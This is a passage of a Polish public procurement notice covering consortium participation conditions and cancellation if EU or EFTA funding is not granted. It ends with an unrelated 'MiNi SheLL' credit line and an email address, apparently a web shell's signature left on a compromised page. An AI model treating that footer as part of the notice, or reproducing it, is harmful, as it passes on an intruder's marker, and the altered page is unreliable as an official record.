1) określone w sekcji III.3)  warunki udziału w postępowaniu spełniał co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie,
2) warunki udziału w postępowaniu dotyczące braku podstaw do wykluczenia z postępowania spełniali Wykonawcy oddzielnie,
3) wymagane w sekcji III.4.1) i III.6)  oświadczenia i dokumenty zostały złożone przez co najmniej jednego z tych Wykonawców albo wszystkich tych Wykonawców wspólnie,
4) wymagane w sekcji III.4.2)  oświadczenia i dokumenty potwierdzające, że Wykonawca nie podlega wykluczeniu zostały złożone oddzielnie przez każdego z tych Wykonawców..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com